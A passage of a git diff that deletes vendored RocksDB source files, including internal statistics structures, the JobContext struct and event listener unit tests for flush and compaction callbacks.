-      this->num_input_records = 0;
-      this->num_dropped_records = 0;
-      this->count = 0;
-    }
-
-    void Add(const CompactionStats& c) {
-      this->micros += c.micros;
-      this->bytes_read_non_output_levels += c.bytes_read_non_output_levels;
-      this->bytes_read_output_level += c.bytes_read_output_level;
-      this->bytes_written += c.bytes_written;
-      this->bytes_moved += c.bytes_moved;
-      this->num_input_files_in_non_output_levels +=
-          c.num_input_files_in_non_output_levels;
-      this->num_input_files_in_output_level +=
-          c.num_input_files_in_output_level;
-      this->num_output_files += c.num_output_files;
-      this->num_input_records += c.num_input_records;
-      this->num_dropped_records += c.num_dropped_records;
-      this->count += c.count;
-    }
-
-    void Subtract(const CompactionStats& c) {
-      this->micros -= c.micros;
-      this->bytes_read_non_output_levels -= c.bytes_read_non_output_levels;
-      this->bytes_read_output_level -= c.bytes_read_output_level;
-      this->bytes_written -= c.bytes_written;
-      this->bytes_moved -= c.bytes_moved;
-      this->num_input_files_in_non_output_levels -=
-          c.num_input_files_in_non_output_levels;
-      this->num_input_files_in_output_level -=
-          c.num_input_files_in_output_level;
-      this->num_output_files -= c.num_output_files;
-      this->num_input_records -= c.num_input_records;
-      this->num_dropped_records -= c.num_dropped_records;
-      this->count -= c.count;
-    }
-  };
-
-  void Clear() {
-    for (int i = 0; i < INTERNAL_DB_STATS_ENUM_MAX; i++) {
-      db_stats_[i].store(0);
-    }
-    for (int i = 0; i < INTERNAL_CF_STATS_ENUM_MAX; i++) {
-      cf_stats_count_[i] = 0;
-      cf_stats_value_[i] = 0;
-    }
-    for (auto& comp_stat : comp_stats_) {
-      comp_stat.Clear();
-    }
-    for (auto& h : file_read_latency_) {
-      h.Clear();
-    }
-    cf_stats_snapshot_.Clear();
-    db_stats_snapshot_.Clear();
-    bg_error_count_ = 0;
-    started_at_ = env_->NowMicros();
-  }
-
-  void AddCompactionStats(int level, const CompactionStats& stats) {
-    comp_stats_[level].Add(stats);
-  }
-
-  void IncBytesMoved(int level, uint64_t amount) {
-    comp_stats_[level].bytes_moved += amount;
-  }
-
-  void AddCFStats(InternalCFStatsType type, uint64_t value) {
-    cf_stats_value_[type] += value;
-    ++cf_stats_count_[type];
-  }
-
-  void AddDBStats(InternalDBStatsType type, uint64_t value,
-                  bool concurrent = false) {
-    auto& v = db_stats_[type];
-    if (concurrent) {
-      v.fetch_add(value, std::memory_order_relaxed);
-    } else {
-      v.store(v.load(std::memory_order_relaxed) + value,
-              std::memory_order_relaxed);
-    }
-  }
-
-  uint64_t GetDBStats(InternalDBStatsType type) {
-    return db_stats_[type].load(std::memory_order_relaxed);
-  }
-
-  HistogramImpl* GetFileReadHist(int level) {
-    return &file_read_latency_[level];
-  }
-
-  uint64_t GetBackgroundErrorCount() const { return bg_error_count_; }
-
-  uint64_t BumpAndGetBackgroundErrorCount() { return ++bg_error_count_; }
-
-  bool GetStringProperty(const DBPropertyInfo& property_info,
-                         const Slice& property, std::string* value);
-
-  bool GetMapProperty(const DBPropertyInfo& property_info,
-                      const Slice& property,
-                      std::map<std::string, double>* value);
-
-  bool GetIntProperty(const DBPropertyInfo& property_info, uint64_t* value,
-                      DBImpl* db);
-
-  bool GetIntPropertyOutOfMutex(const DBPropertyInfo& property_info,
-                                Version* version, uint64_t* value);
-
-  // Store a mapping from the user-facing DB::Properties string to our
-  // DBPropertyInfo struct used internally for retrieving properties.
-  static const std::unordered_map<std::string, DBPropertyInfo> ppt_name_to_info;
-
- private:
-  void DumpDBStats(std::string* value);
-  void DumpCFMapStats(std::map<std::string, double>* cf_stats);
-  void DumpCFMapStats(
-      std::map<int, std::map<LevelStatType, double>>* level_stats,
-      CompactionStats* compaction_stats_sum);
-  void DumpCFStats(std::string* value);
-  void DumpCFStatsNoFileHistogram(std::string* value);
-  void DumpCFFileHistogram(std::string* value);
-
-  // Per-DB stats
-  std::atomic<uint64_t> db_stats_[INTERNAL_DB_STATS_ENUM_MAX];
-  // Per-ColumnFamily stats
-  uint64_t cf_stats_value_[INTERNAL_CF_STATS_ENUM_MAX];
-  uint64_t cf_stats_count_[INTERNAL_CF_STATS_ENUM_MAX];
-  // Per-ColumnFamily/level compaction stats
-  std::vector<CompactionStats> comp_stats_;
-  std::vector<HistogramImpl> file_read_latency_;
-
-  // Used to compute per-interval statistics
-  struct CFStatsSnapshot {
-    // ColumnFamily-level stats
-    CompactionStats comp_stats;
-    uint64_t ingest_bytes_flush;      // Bytes written to L0 (Flush)
-    uint64_t stall_count;             // Stall count
-    // Stats from compaction jobs - bytes written, bytes read, duration.
-    uint64_t compact_bytes_write;
-    uint64_t compact_bytes_read;
-    uint64_t compact_micros;
-    double seconds_up;
-
-    // AddFile specific stats
-    uint64_t ingest_bytes_addfile;     // Total Bytes ingested
-    uint64_t ingest_files_addfile;     // Total number of files ingested
-    uint64_t ingest_l0_files_addfile;  // Total number of files ingested to L0
-    uint64_t ingest_keys_addfile;      // Total number of keys ingested
-
-    CFStatsSnapshot()
-        : comp_stats(0),
-          ingest_bytes_flush(0),
-          stall_count(0),
-          compact_bytes_write(0),
-          compact_bytes_read(0),
-          compact_micros(0),
-          seconds_up(0),
-          ingest_bytes_addfile(0),
-          ingest_files_addfile(0),
-          ingest_l0_files_addfile(0),
-          ingest_keys_addfile(0) {}
-
-    void Clear() {
-      comp_stats.Clear();
-      ingest_bytes_flush = 0;
-      stall_count = 0;
-      compact_bytes_write = 0;
-      compact_bytes_read = 0;
-      compact_micros = 0;
-      seconds_up = 0;
-      ingest_bytes_addfile = 0;
-      ingest_files_addfile = 0;
-      ingest_l0_files_addfile = 0;
-      ingest_keys_addfile = 0;
-    }
-  } cf_stats_snapshot_;
-
-  struct DBStatsSnapshot {
-    // DB-level stats
-    uint64_t ingest_bytes;            // Bytes written by user
-    uint64_t wal_bytes;               // Bytes written to WAL
-    uint64_t wal_synced;              // Number of times WAL is synced
-    uint64_t write_with_wal;          // Number of writes that request WAL
-    // These count the number of writes processed by the calling thread or
-    // another thread.
-    uint64_t write_other;
-    uint64_t write_self;
-    // Total number of keys written. write_self and write_other measure number
-    // of write requests written, Each of the write request can contain updates
-    // to multiple keys. num_keys_written is total number of keys updated by all
-    // those writes.
-    uint64_t num_keys_written;
-    // Total time writes delayed by stalls.
-    uint64_t write_stall_micros;
-    double seconds_up;
-
-    DBStatsSnapshot()
-        : ingest_bytes(0),
-          wal_bytes(0),
-          wal_synced(0),
-          write_with_wal(0),
-          write_other(0),
-          write_self(0),
-          num_keys_written(0),
-          write_stall_micros(0),
-          seconds_up(0) {}
-
-    void Clear() {
-      ingest_bytes = 0;
-      wal_bytes = 0;
-      wal_synced = 0;
-      write_with_wal = 0;
-      write_other = 0;
-      write_self = 0;
-      num_keys_written = 0;
-      write_stall_micros = 0;
-      seconds_up = 0;
-    }
-  } db_stats_snapshot_;
-
-  // Handler functions for getting property values. They use "value" as a value-
-  // result argument, and return true upon successfully setting "value".
-  bool HandleNumFilesAtLevel(std::string* value, Slice suffix);
-  bool HandleCompressionRatioAtLevelPrefix(std::string* value, Slice suffix);
-  bool HandleLevelStats(std::string* value, Slice suffix);
-  bool HandleStats(std::string* value, Slice suffix);
-  bool HandleCFMapStats(std::map<std::string, double>* compaction_stats);
-  bool HandleCFStats(std::string* value, Slice suffix);
-  bool HandleCFStatsNoFileHistogram(std::string* value, Slice suffix);
-  bool HandleCFFileHistogram(std::string* value, Slice suffix);
-  bool HandleDBStats(std::string* value, Slice suffix);
-  bool HandleSsTables(std::string* value, Slice suffix);
-  bool HandleAggregatedTableProperties(std::string* value, Slice suffix);
-  bool HandleAggregatedTablePropertiesAtLevel(std::string* value, Slice suffix);
-  bool HandleNumImmutableMemTable(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleNumImmutableMemTableFlushed(uint64_t* value, DBImpl* db,
-                                         Version* version);
-  bool HandleMemTableFlushPending(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleNumRunningFlushes(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCompactionPending(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumRunningCompactions(uint64_t* value, DBImpl* db,
-                                   Version* version);
-  bool HandleBackgroundErrors(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCurSizeActiveMemTable(uint64_t* value, DBImpl* db,
-                                   Version* version);
-  bool HandleCurSizeAllMemTables(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleSizeAllMemTables(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumEntriesActiveMemTable(uint64_t* value, DBImpl* db,
-                                      Version* version);
-  bool HandleNumEntriesImmMemTables(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleNumDeletesActiveMemTable(uint64_t* value, DBImpl* db,
-                                      Version* version);
-  bool HandleNumDeletesImmMemTables(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleEstimateNumKeys(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumSnapshots(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleOldestSnapshotTime(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleNumLiveVersions(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleCurrentSuperVersionNumber(uint64_t* value, DBImpl* db,
-                                       Version* version);
-  bool HandleIsFileDeletionsEnabled(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleBaseLevel(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleTotalSstFilesSize(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleEstimatePendingCompactionBytes(uint64_t* value, DBImpl* db,
-                                            Version* version);
-  bool HandleEstimateTableReadersMem(uint64_t* value, DBImpl* db,
-                                     Version* version);
-  bool HandleEstimateLiveDataSize(uint64_t* value, DBImpl* db,
-                                  Version* version);
-  bool HandleMinLogNumberToKeep(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleActualDelayedWriteRate(uint64_t* value, DBImpl* db,
-                                    Version* version);
-  bool HandleIsWriteStopped(uint64_t* value, DBImpl* db, Version* version);
-  bool HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* db,
-                                   Version* version);
-
-  // Total number of background errors encountered. Every time a flush task
-  // or compaction task fails, this counter is incremented. The failure can
-  // be caused by any possible reason, including file system errors, out of
-  // resources, or input file corruption. Failing when retrying the same flush
-  // or compaction will cause the counter to increase too.
-  uint64_t bg_error_count_;
-
-  const int number_levels_;
-  Env* env_;
-  ColumnFamilyData* cfd_;
-  uint64_t started_at_;
-};
-
-#else
-
-class InternalStats {
- public:
-  enum InternalCFStatsType {
-    LEVEL0_SLOWDOWN_TOTAL,
-    LEVEL0_SLOWDOWN_WITH_COMPACTION,
-    MEMTABLE_COMPACTION,
-    MEMTABLE_SLOWDOWN,
-    LEVEL0_NUM_FILES_TOTAL,
-    LEVEL0_NUM_FILES_WITH_COMPACTION,
-    SOFT_PENDING_COMPACTION_BYTES_LIMIT,
-    HARD_PENDING_COMPACTION_BYTES_LIMIT,
-    WRITE_STALLS_ENUM_MAX,
-    BYTES_FLUSHED,
-    BYTES_INGESTED_ADD_FILE,
-    INGESTED_NUM_FILES_TOTAL,
-    INGESTED_LEVEL0_NUM_FILES_TOTAL,
-    INGESTED_NUM_KEYS_TOTAL,
-    INTERNAL_CF_STATS_ENUM_MAX,
-  };
-
-  enum InternalDBStatsType {
-    WAL_FILE_BYTES,
-    WAL_FILE_SYNCED,
-    BYTES_WRITTEN,
-    NUMBER_KEYS_WRITTEN,
-    WRITE_DONE_BY_OTHER,
-    WRITE_DONE_BY_SELF,
-    WRITE_WITH_WAL,
-    WRITE_STALL_MICROS,
-    INTERNAL_DB_STATS_ENUM_MAX,
-  };
-
-  InternalStats(int num_levels, Env* env, ColumnFamilyData* cfd) {}
-
-  struct CompactionStats {
-    uint64_t micros;
-    uint64_t bytes_read_non_output_levels;
-    uint64_t bytes_read_output_level;
-    uint64_t bytes_written;
-    uint64_t bytes_moved;
-    int num_input_files_in_non_output_levels;
-    int num_input_files_in_output_level;
-    int num_output_files;
-    uint64_t num_input_records;
-    uint64_t num_dropped_records;
-    int count;
-
-    explicit CompactionStats(int _count = 0) {}
-
-    explicit CompactionStats(const CompactionStats& c) {}
-
-    void Add(const CompactionStats& c) {}
-
-    void Subtract(const CompactionStats& c) {}
-  };
-
-  void AddCompactionStats(int level, const CompactionStats& stats) {}
-
-  void IncBytesMoved(int level, uint64_t amount) {}
-
-  void AddCFStats(InternalCFStatsType type, uint64_t value) {}
-
-  void AddDBStats(InternalDBStatsType type, uint64_t value,
-                  bool concurrent = false) {}
-
-  HistogramImpl* GetFileReadHist(int level) { return nullptr; }
-
-  uint64_t GetBackgroundErrorCount() const { return 0; }
-
-  uint64_t BumpAndGetBackgroundErrorCount() { return 0; }
-
-  bool GetStringProperty(const DBPropertyInfo& property_info,
-                         const Slice& property, std::string* value) {
-    return false;
-  }
-
-  bool GetMapProperty(const DBPropertyInfo& property_info,
-                      const Slice& property,
-                      std::map<std::string, double>* value) {
-    return false;
-  }
-
-  bool GetIntProperty(const DBPropertyInfo& property_info, uint64_t* value,
-                      DBImpl* db) const {
-    return false;
-  }
-
-  bool GetIntPropertyOutOfMutex(const DBPropertyInfo& property_info,
-                                Version* version, uint64_t* value) const {
-    return false;
-  }
-};
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/job_context.h b/thirdparty/rocksdb/db/job_context.h
deleted file mode 100644
index 950a3a6..0000000
--- a/thirdparty/rocksdb/db/job_context.h
+++ /dev/null
@@ -1,129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "db/log_writer.h"
-
-namespace rocksdb {
-
-class MemTable;
-
-struct JobContext {
-  inline bool HaveSomethingToDelete() const {
-    return full_scan_candidate_files.size() || sst_delete_files.size() ||
-           log_delete_files.size() || manifest_delete_files.size() ||
-           new_superversion != nullptr || superversions_to_free.size() > 0 ||
-           memtables_to_free.size() > 0 || logs_to_free.size() > 0;
-  }
-
-  // Structure to store information for candidate files to delete.
-  struct CandidateFileInfo {
-    std::string file_name;
-    uint32_t path_id;
-    CandidateFileInfo(std::string name, uint32_t path)
-        : file_name(std::move(name)), path_id(path) {}
-    bool operator==(const CandidateFileInfo& other) const {
-      return file_name == other.file_name && path_id == other.path_id;
-    }
-  };
-
-  // Unique job id
-  int job_id;
-
-  // a list of all files that we'll consider deleting
-  // (every once in a while this is filled up with all files
-  // in the DB directory)
-  // (filled only if we're doing full scan)
-  std::vector<CandidateFileInfo> full_scan_candidate_files;
-
-  // the list of all live sst files that cannot be deleted
-  std::vector<FileDescriptor> sst_live;
-
-  // a list of sst files that we need to delete
-  std::vector<FileMetaData*> sst_delete_files;
-
-  // a list of log files that we need to delete
-  std::vector<uint64_t> log_delete_files;
-
-  // a list of log files that we need to preserve during full purge since they
-  // will be reused later
-  std::vector<uint64_t> log_recycle_files;
-
-  // a list of manifest files that we need to delete
-  std::vector<std::string> manifest_delete_files;
-
-  // a list of memtables to be free
-  autovector<MemTable*> memtables_to_free;
-
-  autovector<SuperVersion*> superversions_to_free;
-
-  autovector<log::Writer*> logs_to_free;
-
-  SuperVersion* new_superversion;  // if nullptr no new superversion
-
-  // the current manifest_file_number, log_number and prev_log_number
-  // that corresponds to the set of files in 'live'.
-  uint64_t manifest_file_number;
-  uint64_t pending_manifest_file_number;
-  uint64_t log_number;
-  uint64_t prev_log_number;
-
-  uint64_t min_pending_output = 0;
-  uint64_t prev_total_log_size = 0;
-  size_t num_alive_log_files = 0;
-  uint64_t size_log_to_delete = 0;
-
-  explicit JobContext(int _job_id, bool create_superversion = false) {
-    job_id = _job_id;
-    manifest_file_number = 0;
-    pending_manifest_file_number = 0;
-    log_number = 0;
-    prev_log_number = 0;
-    new_superversion = create_superversion ? new SuperVersion() : nullptr;
-  }
-
-  // For non-empty JobContext Clean() has to be called at least once before
-  // before destruction (see asserts in ~JobContext()). Should be called with
-  // unlocked DB mutex. Destructor doesn't call Clean() to avoid accidentally
-  // doing potentially slow Clean() with locked DB mutex.
-  void Clean() {
-    // free pending memtables
-    for (auto m : memtables_to_free) {
-      delete m;
-    }
-    // free superversions
-    for (auto s : superversions_to_free) {
-      delete s;
-    }
-    for (auto l : logs_to_free) {
-      delete l;
-    }
-    // if new_superversion was not used, it will be non-nullptr and needs
-    // to be freed here
-    delete new_superversion;
-
-    memtables_to_free.clear();
-    superversions_to_free.clear();
-    logs_to_free.clear();
-    new_superversion = nullptr;
-  }
-
-  ~JobContext() {
-    assert(memtables_to_free.size() == 0);
-    assert(superversions_to_free.size() == 0);
-    assert(new_superversion == nullptr);
-    assert(logs_to_free.size() == 0);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/listener_test.cc b/thirdparty/rocksdb/db/listener_test.cc
deleted file mode 100644
index 5b5f226..0000000
--- a/thirdparty/rocksdb/db/listener_test.cc
+++ /dev/null
@@ -1,895 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/block_based_table_factory.h"
-#include "table/plain_table_factory.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-class EventListenerTest : public DBTestBase {
- public:
-  EventListenerTest() : DBTestBase("/listener_test") {}
-
-  const size_t k110KB = 110 << 10;
-};
-
-struct TestPropertiesCollector : public rocksdb::TablePropertiesCollector {
-  virtual rocksdb::Status AddUserKey(const rocksdb::Slice& key,
-                                     const rocksdb::Slice& value,
-                                     rocksdb::EntryType type,
-                                     rocksdb::SequenceNumber seq,
-                                     uint64_t file_size) override {
-    return Status::OK();
-  }
-  virtual rocksdb::Status Finish(
-      rocksdb::UserCollectedProperties* properties) override {
-    properties->insert({"0", "1"});
-    return Status::OK();
-  }
-
-  virtual const char* Name() const override {
-    return "TestTablePropertiesCollector";
-  }
-
-  rocksdb::UserCollectedProperties GetReadableProperties() const override {
-    rocksdb::UserCollectedProperties ret;
-    ret["2"] = "3";
-    return ret;
-  }
-};
-
-class TestPropertiesCollectorFactory : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    return new TestPropertiesCollector;
-  }
-  const char* Name() const override { return "TestTablePropertiesCollector"; }
-};
-
-class TestCompactionListener : public EventListener {
- public:
-  void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    compacted_dbs_.push_back(db);
-    ASSERT_GT(ci.input_files.size(), 0U);
-    ASSERT_GT(ci.output_files.size(), 0U);
-    ASSERT_EQ(db->GetEnv()->GetThreadID(), ci.thread_id);
-    ASSERT_GT(ci.thread_id, 0U);
-
-    for (auto fl : {ci.input_files, ci.output_files}) {
-      for (auto fn : fl) {
-        auto it = ci.table_properties.find(fn);
-        ASSERT_NE(it, ci.table_properties.end());
-        auto tp = it->second;
-        ASSERT_TRUE(tp != nullptr);
-        ASSERT_EQ(tp->user_collected_properties.find("0")->second, "1");
-      }
-    }
-  }
-
-  std::vector<DB*> compacted_dbs_;
-  std::mutex mutex_;
-};
-
-TEST_F(EventListenerTest, OnSingleDBCompactionTest) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  const int kNumL0Files = 4;
-
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-
-  TestCompactionListener* listener = new TestCompactionListener();
-  options.listeners.emplace_back(listener);
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  CreateAndReopenWithCF(cf_names, options);
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    const Slice kRangeStart = "a";
-    const Slice kRangeEnd = "z";
-    ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), handles_[i],
-                                     &kRangeStart, &kRangeEnd));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  ASSERT_EQ(listener->compacted_dbs_.size(), cf_names.size());
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    ASSERT_EQ(listener->compacted_dbs_[i], db_);
-  }
-}
-
-// This simple Listener can only handle one flush at a time.
-class TestFlushListener : public EventListener {
- public:
-  explicit TestFlushListener(Env* env)
-      : slowdown_count(0), stop_count(0), db_closed(), env_(env) {
-    db_closed = false;
-  }
-  void OnTableFileCreated(
-      const TableFileCreationInfo& info) override {
-    // remember the info for later checking the FlushJobInfo.
-    prev_fc_info_ = info;
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-    ASSERT_GT(info.table_properties.data_size, 0U);
-    ASSERT_GT(info.table_properties.raw_key_size, 0U);
-    ASSERT_GT(info.table_properties.raw_value_size, 0U);
-    ASSERT_GT(info.table_properties.num_data_blocks, 0U);
-    ASSERT_GT(info.table_properties.num_entries, 0U);
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-    // Verify the id of the current thread that created this table
-    // file matches the id of any active flush or compaction thread.
-    uint64_t thread_id = env_->GetThreadID();
-    std::vector<ThreadStatus> thread_list;
-    ASSERT_OK(env_->GetThreadList(&thread_list));
-    bool found_match = false;
-    for (auto thread_status : thread_list) {
-      if (thread_status.operation_type == ThreadStatus::OP_FLUSH ||
-          thread_status.operation_type == ThreadStatus::OP_COMPACTION) {
-        if (thread_id == thread_status.thread_id) {
-          found_match = true;
-          break;
-        }
-      }
-    }
-    ASSERT_TRUE(found_match);
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  }
-
-  void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    flushed_dbs_.push_back(db);
-    flushed_column_family_names_.push_back(info.cf_name);
-    if (info.triggered_writes_slowdown) {
-      slowdown_count++;
-    }
-    if (info.triggered_writes_stop) {
-      stop_count++;
-    }
-    // verify whether the previously created file matches the flushed file.
-    ASSERT_EQ(prev_fc_info_.db_name, db->GetName());
-    ASSERT_EQ(prev_fc_info_.cf_name, info.cf_name);
-    ASSERT_EQ(prev_fc_info_.job_id, info.job_id);
-    ASSERT_EQ(prev_fc_info_.file_path, info.file_path);
-    ASSERT_EQ(db->GetEnv()->GetThreadID(), info.thread_id);
-    ASSERT_GT(info.thread_id, 0U);
-    ASSERT_EQ(info.table_properties.user_collected_properties.find("0")->second,
-              "1");
-  }
-
-  std::vector<std::string> flushed_column_family_names_;
-  std::vector<DB*> flushed_dbs_;
-  int slowdown_count;
-  int stop_count;
-  bool db_closing;
-  std::atomic_bool db_closed;
-  TableFileCreationInfo prev_fc_info_;
-
- protected:
-  Env* env_;
-};
-
-TEST_F(EventListenerTest, OnSingleDBFlushTest) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.write_buffer_size = k110KB;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  options.listeners.emplace_back(listener);
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  CreateAndReopenWithCF(cf_names, options);
-
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(listener->flushed_dbs_.size(), i);
-    ASSERT_EQ(listener->flushed_column_family_names_.size(), i);
-  }
-
-  // make sure call-back functions are called in the right order
-  for (size_t i = 0; i < cf_names.size(); ++i) {
-    ASSERT_EQ(listener->flushed_dbs_[i], db_);
-    ASSERT_EQ(listener->flushed_column_family_names_[i], cf_names[i]);
-  }
-}
-
-TEST_F(EventListenerTest, MultiCF) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.write_buffer_size = k110KB;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  TestFlushListener* listener = new TestFlushListener(options.env);
-  options.listeners.emplace_back(listener);
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-  CreateAndReopenWithCF(cf_names, options);
-
-  ASSERT_OK(Put(1, "pikachu", std::string(90000, 'p')));
-  ASSERT_OK(Put(2, "ilya", std::string(90000, 'i')));
-  ASSERT_OK(Put(3, "muromec", std::string(90000, 'm')));
-  ASSERT_OK(Put(4, "dobrynia", std::string(90000, 'd')));
-  ASSERT_OK(Put(5, "nikitich", std::string(90000, 'n')));
-  ASSERT_OK(Put(6, "alyosha", std::string(90000, 'a')));
-  ASSERT_OK(Put(7, "popovich", std::string(90000, 'p')));
-  for (int i = 1; i < 8; ++i) {
-    ASSERT_OK(Flush(i));
-    ASSERT_EQ(listener->flushed_dbs_.size(), i);
-    ASSERT_EQ(listener->flushed_column_family_names_.size(), i);
-  }
-
-  // make sure call-back functions are called in the right order
-  for (size_t i = 0; i < cf_names.size(); i++) {
-    ASSERT_EQ(listener->flushed_dbs_[i], db_);
-    ASSERT_EQ(listener->flushed_column_family_names_[i], cf_names[i]);
-  }
-}
-
-TEST_F(EventListenerTest, MultiDBMultiListeners) {
-  Options options;
-  options.env = CurrentOptions().env;
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  options.enable_thread_tracking = true;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  options.table_properties_collector_factories.push_back(
-      std::make_shared<TestPropertiesCollectorFactory>());
-  std::vector<TestFlushListener*> listeners;
-  const int kNumDBs = 5;
-  const int kNumListeners = 10;
-  for (int i = 0; i < kNumListeners; ++i) {
-    listeners.emplace_back(new TestFlushListener(options.env));
-  }
-
-  std::vector<std::string> cf_names = {
-      "pikachu", "ilya", "muromec", "dobrynia",
-      "nikitich", "alyosha", "popovich"};
-
-  options.create_if_missing = true;
-  for (int i = 0; i < kNumListeners; ++i) {
-    options.listeners.emplace_back(listeners[i]);
-  }
-  DBOptions db_opts(options);
-  ColumnFamilyOptions cf_opts(options);
-
-  std::vector<DB*> dbs;
-  std::vector<std::vector<ColumnFamilyHandle *>> vec_handles;
-
-  for (int d = 0; d < kNumDBs; ++d) {
-    ASSERT_OK(DestroyDB(dbname_ + ToString(d), options));
-    DB* db;
-    std::vector<ColumnFamilyHandle*> handles;
-    ASSERT_OK(DB::Open(options, dbname_ + ToString(d), &db));
